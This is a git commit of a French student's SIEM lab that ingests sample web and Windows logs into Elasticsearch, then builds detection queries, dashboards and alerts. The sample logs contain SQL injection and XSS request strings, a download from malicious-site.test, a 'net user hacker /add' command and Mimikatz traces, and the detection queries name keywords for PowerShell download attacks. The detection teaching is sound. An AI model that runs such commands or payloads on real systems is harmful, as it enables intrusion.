feat: Semaine 12, jour 3

This commit is contained in:
gauvainboiche
2026-08-05 14:55:28 +02:00
parent bb74ba5173
commit 10ccd10760
28 changed files with 361 additions and 0 deletions
@@ -0,0 +1,235 @@
# Lab 02 - Cybersecurity 3
Installation Wazuh
## 1. Mise en place
Le `docker-compose.yml` a été modifié pour répondre aux dernières exigences ElasticSearch, incluant version, arguments et commandes d'amorçage.
`filebeat.yml` a également été modifié pour la version 9.4.4.
## 2. Démarrage de la stack
![alt text](image.png)
## 3. Ingestion des logs
Les fichiers sont bien placés dans le dossier local `./data` et montés en *Read-Only* dans le conteneur `filebeat`. Une rapide inspection dans le conteneur permet de retrouver les documents :
```bash
> docker exec -it filebeat bash
[root@189c7e30152f filebeat]# ls
LICENSE.txt README.md fields.yml filebeat.reference.yml kibana module
NOTICE.txt data filebeat filebeat.yml logs modules.d
[root@189c7e30152f filebeat]# pwd
/usr/share/filebeat
[root@189c7e30152f filebeat]# ls /var/log
btmp hawkey.log lastlog powershell_eventlog.csv private webserver.log wtmp
```
## 4. Requêtes de détection
On constate que les fichiers `filebeat-*` sont correctement journalisés dans ElasticSearch, avec du détail sous format JSON :
![alt text](image-1.png)
```json
{
"@timestamp": [
"2026-08-05T08:24:24.471Z"
],
"agent.ephemeral_id": [
"60ae4b96-7c76-4a10-b96a-aa2926124ac2"
],
"agent.hostname": [
"189c7e30152f"
],
"agent.id": [
"2b9a5d07-efbf-406e-88ba-21a632984a62"
],
"agent.name": [
"189c7e30152f"
],
"agent.type": [
"filebeat"
],
"agent.version": [
"9.4.4"
],
"ecs.version": [
"8.0.0"
],
"fields.type": [
"powershell"
],
"host.name": [
"189c7e30152f"
],
"input.type": [
"filestream"
],
"log.file.device_id": [
"74"
],
"log.file.fingerprint": [
"0552875f2772591c83e87ce749d75a90e9aa8aae5cc637f79755d3154df4ac37"
],
"log.file.inode": [
"12103423998720744"
],
"log.file.path": [
"/var/log/powershell_eventlog.csv"
],
"log.offset": [
1661
],
"message": [
"\"2025-07-29T14:40:10Z\",\"4720\",\"Information\",\"Microsoft-Windows-Security-Auditing\",\"Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs\""
],
"_id": "ZOMG0Z8BjDC_E0hYQKKW",
"_index": ".ds-filebeat-9.4.4-2026.08.05-000001",
"_score": null
}
```
Je mets à profit mon écran large et je fais un tri par champs pour avoir un détail pertinent sur les logs :
![alt text](image-2.png)
A cette occasion, je corrige les requêtes pour refléter les nouvelles normes utilisées sur ElasticSearch / OpenSearch, et un référent que j'utilise qui est Datadog :
```sql
-- type:"web" AND (url:* OR query:*) AND message:"UNION SELECT"
fields.type:web AND message:("UNION SELECT" OR "union select" OR "'1'='1")
-- type:"powershell" AND (message:*"New-Object Net.WebClient"* OR message:*"Invoke-Expression"*)
fields.type:powershell AND message:("New-Object Net.WebClient" OR "Invoke-*")
-- type:"web" AND status:401
fields.type:web AND message:(" 401 ")
```
## 6. Création du Dashboard
### Créer des métriques
Le seul champ reconnaissable par les logs est "message", qui contient les informations. En revanche, ElasticSearch ne gère "pas" nativement le CONTENU des messages en les compartimentant. Il faut pouvoir extraire ces données. La solution la plus efficace est de passer une instruction dans Filebeat, mais dans un vrai environnement de remontée de logs, on n'a que rarement accès à l'agent émetteur. Aussi va-t-on essayer de faire des métriques dans Kibana directement.
Pour ça, je vais dans `Dev Tools > Console` et je fais, aidé de Kimi K2.7, un "Ingest Pipeline Conditionnel" :
```json
PUT _ingest/pipeline/multi_log_parser
{
"description": "Détecte et sépare les logs Web et PowerShell/Windows",
"processors": [
{
"dissect": {
"description": "Parse les logs Web au format Apache/Nginx",
"if": "ctx.message != null && ctx.message.contains('HTTP/')",
"field": "message",
"pattern": "%{web_client_ip} - - [%{web_timestamp}] \"%{web_http_method} %{web_request_path} HTTP/%{web_http_version}\" %{web_status_code} %{web_bytes} \"%{web_referrer}\" \"%{web_user_agent}\""
}
},
{
"csv": {
"description": "Parse les logs Windows/PowerShell au format CSV",
"if": "ctx.message != null && (ctx.message.contains('Microsoft-Windows') || ctx.message.startsWith('\"202'))",
"field": "message",
"target_fields": [
"pws_timestamp",
"pws_event_id",
"pws_level",
"pws_provider",
"pws_message"
]
}
}
]
}
```
![alt text](image-3.png)
Pas de succès. Je tente alors avec `Stack Management > Data Views > Logs` de faire des champs personnalisés :
```js
if (params._source.message != null) {
def msg = params._source.message;
if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; }
// Exécute uniquement si le message ressemble au log Windows
if (msg instanceof String && msg.contains('Microsoft-Windows')) {
String[] parts = msg.splitOnToken('","');
if (parts.length > 1) {
emit(parts[1].replace('"', '').trim()); // Extrait l'ID d'évènement
}
}
}
```
```js
if (params._source.message != null) {
def msg = params._source.message;
if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; }
// Exécute uniquement si le message contient une requête HTTP
if (msg instanceof String && msg.contains('HTTP/')) {
String[] parts = msg.splitOnToken(' ');
if (parts.length >= 9) {
emit(parts[8].trim()); // Extrait le code de réponse (200, 401, 403...)
}
}
}
```
J'ai des résultats :
![alt text](image-4.png)
![alt text](image-5.png)
Je peux maintenant faire un VRAI tableau avec mes métriques :
![alt text](image-6.png)
Et enfin faire une visualisation :
![alt text](image-7.png)
Hélas le jeu de données est
## 7. Alertes automatisées
Pour l'alerte demandée, je vais dans `Stack Management > Alerts and Insights > Rules` bien que ça ne soit pas très instinctif, mais pour les besoins du cours, il faudra y opérer.
### Interruption
![alt text](image-8.png)
Je dois rajouter un élément au `kibana.yml` du conteneur :
```yml
xpack.encryptedSavedObjects.encryptionKey: "ma_cle_secrete_super_longue_de_32_caracteres!"
```
J'édite aussi le `docker-compose.yml` pour déploiement automatique.
Je définis les conditions de déclenchement (ici, très parano, faute de gros jeux de données) :
![alt text](image-9.png)
Pour les actions, je suis obligé d'activer la licence d'essai 30 jours (ça va, on a le temps) mais je n'ai que deux actions de disponibles, là om il y a normalement des dizaines de choix.
**POUR LES BESOINS DE L'EXERCICE** je ne peux pas générer de WorkFlow complet. En revanche je peux montrer un exemple défini sur Datadog, utilisant un Webhook paramétré dans Slack pour prévenir les utilisateurs d'une instance EC2 qui tourne à vide :
![alt text](image-10.png)
J'ai déjà fait du déploiement :
- Courriel
- JIRA OpsGenie
- Webhook Slack
- Webhook Discord
- Application WhatsApp pour les urgences VIP
Binary file not shown.
@@ -0,0 +1,6 @@
Date,Time,SourceIP,Username,Status
2025-07-29,13:58:01,192.168.1.100,admin,Failed
2025-07-29,13:58:05,192.168.1.100,admin,Failed
2025-07-29,13:58:09,192.168.1.100,root,Failed
2025-07-29,13:58:12,192.168.1.100,root,Failed
2025-07-29,13:58:15,192.168.1.100,root,Success
1 Date Time SourceIP Username Status
2 2025-07-29 13:58:01 192.168.1.100 admin Failed
3 2025-07-29 13:58:05 192.168.1.100 admin Failed
4 2025-07-29 13:58:09 192.168.1.100 root Failed
5 2025-07-29 13:58:12 192.168.1.100 root Failed
6 2025-07-29 13:58:15 192.168.1.100 root Success
@@ -0,0 +1,4 @@
PID,ProcessName,CommandLine,ParentPID
2345,svchost.exe,C:\Windows\System32\svchost.exe -k netsvcs,520
3378,powershell.exe,powershell -nop -w hidden -enc SQB...=,2345
3981,evil.exe,C:\Users\Public\evil.exe,3378
1 PID ProcessName CommandLine ParentPID
2 2345 svchost.exe C:\Windows\System32\svchost.exe -k netsvcs 520
3 3378 powershell.exe powershell -nop -w hidden -enc SQB...= 2345
4 3981 evil.exe C:\Users\Public\evil.exe 3378
@@ -0,0 +1,4 @@
Date,Time,EventID,Message
2025-07-29,14:05:11,4104,Script PowerShell suspect exécuté : Invoke-Mimikatz
2025-07-29,14:07:25,4103,Commande PowerShell encodée détectée
2025-07-29,14:09:43,4688,Nouveau processus : powershell.exe -nop -w hidden
1 Date Time EventID Message
2 2025-07-29 14:05:11 4104 Script PowerShell suspect exécuté : Invoke-Mimikatz
3 2025-07-29 14:07:25 4103 Commande PowerShell encodée détectée
4 2025-07-29 14:09:43 4688 Nouveau processus : powershell.exe -nop -w hidden
@@ -0,0 +1,10 @@
192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
@@ -0,0 +1,11 @@
"TimeCreated","Id","LevelDisplayName","ProviderName","Message"
"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3"
"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect"
"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1"
"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356"
"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe"
"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution"
"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe"
"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add"
"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15"
"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs"
1 TimeCreated Id LevelDisplayName ProviderName Message
2 2025-07-29T14:23:51Z 4624 Information Microsoft-Windows-Security-Auditing Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3
3 2025-07-29T14:25:12Z 4625 Warning Microsoft-Windows-Security-Auditing Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect
4 2025-07-29T14:27:33Z 4688 Information Microsoft-Windows-Security-Auditing Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1
5 2025-07-29T14:29:55Z 4689 Information Microsoft-Windows-Security-Auditing Un processus a été terminé. Nom du processus : powershell.exe, PID=4356
6 2025-07-29T14:31:12Z 4104 Information Microsoft-Windows-PowerShell Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe
7 2025-07-29T14:32:45Z 4100 Warning Microsoft-Windows-PowerShell Échec d'exécution du script en raison de la stratégie d'exécution
8 2025-07-29T14:34:20Z 7045 Information Service Control Manager Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe
9 2025-07-29T14:36:05Z 4688 Information Microsoft-Windows-Security-Auditing Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add
10 2025-07-29T14:38:22Z 4624 Information Microsoft-Windows-Security-Auditing Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15
11 2025-07-29T14:40:10Z 4720 Information Microsoft-Windows-Security-Auditing Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs
+10
View File
@@ -0,0 +1,10 @@
192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,11 @@
"TimeCreated","Id","LevelDisplayName","ProviderName","Message"
"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3"
"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect"
"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1"
"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356"
"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe"
"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution"
"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe"
"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add"
"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15"
"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs"
1 TimeCreated Id LevelDisplayName ProviderName Message
2 2025-07-29T14:23:51Z 4624 Information Microsoft-Windows-Security-Auditing Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3
3 2025-07-29T14:25:12Z 4625 Warning Microsoft-Windows-Security-Auditing Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect
4 2025-07-29T14:27:33Z 4688 Information Microsoft-Windows-Security-Auditing Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1
5 2025-07-29T14:29:55Z 4689 Information Microsoft-Windows-Security-Auditing Un processus a été terminé. Nom du processus : powershell.exe, PID=4356
6 2025-07-29T14:31:12Z 4104 Information Microsoft-Windows-PowerShell Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe
7 2025-07-29T14:32:45Z 4100 Warning Microsoft-Windows-PowerShell Échec d'exécution du script en raison de la stratégie d'exécution
8 2025-07-29T14:34:20Z 7045 Information Service Control Manager Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe
9 2025-07-29T14:36:05Z 4688 Information Microsoft-Windows-Security-Auditing Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add
10 2025-07-29T14:38:22Z 4624 Information Microsoft-Windows-Security-Auditing Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15
11 2025-07-29T14:40:10Z 4720 Information Microsoft-Windows-Security-Auditing Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs
@@ -0,0 +1,10 @@
192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q=<script>alert(1)</script> HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
@@ -0,0 +1,41 @@
services:
elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:9.4.4
container_name: elasticsearch
environment:
- discovery.type=single-node
- xpack.security.enabled=false
- "ES_JAVA_OPTS=-Xms1g -Xmx1g"
ports:
- "9200:9200"
healthcheck:
test: ["CMD-SHELL", "curl -fsS http://localhost:9200/_cluster/health >/dev/null || exit 1"]
interval: 30s
timeout: 10s
retries: 20
start_period: 30s
kibana:
image: docker.elastic.co/kibana/kibana:9.4.4
container_name: kibana
ports:
- "5601:5601"
depends_on:
elasticsearch:
condition: service_healthy
environment:
- ELASTICSEARCH_HOSTS=http://elasticsearch:9200
- xpack.encryptedSavedObjects.encryptionKey=ma_cle_secrete_super_longue_de_32_caracteres!
filebeat:
image: docker.elastic.co/beats/filebeat:9.4.4
container_name: filebeat
command: ["filebeat", "-e", "--strict.perms=false"]
user: root
volumes:
- ./data/webserver.log:/var/log/webserver.log:ro
- ./data/powershell_eventlog.csv:/var/log/powershell_eventlog.csv:ro
- ./filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
depends_on:
elasticsearch:
condition: service_healthy
@@ -0,0 +1,19 @@
filebeat.inputs:
- type: filestream
id: web-logs
enabled: true
paths:
- /var/log/webserver.log
fields:
type: web
- type: filestream
id: powershell-logs
enabled: true
paths:
- /var/log/powershell_eventlog.csv
fields:
type: powershell
output.elasticsearch:
hosts: ["http://elasticsearch:9200"]
Binary file not shown.

After

Width:  |  Height:  |  Size: 375 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 108 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 326 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 228 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 216 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 104 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 222 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 151 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 120 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 56 KiB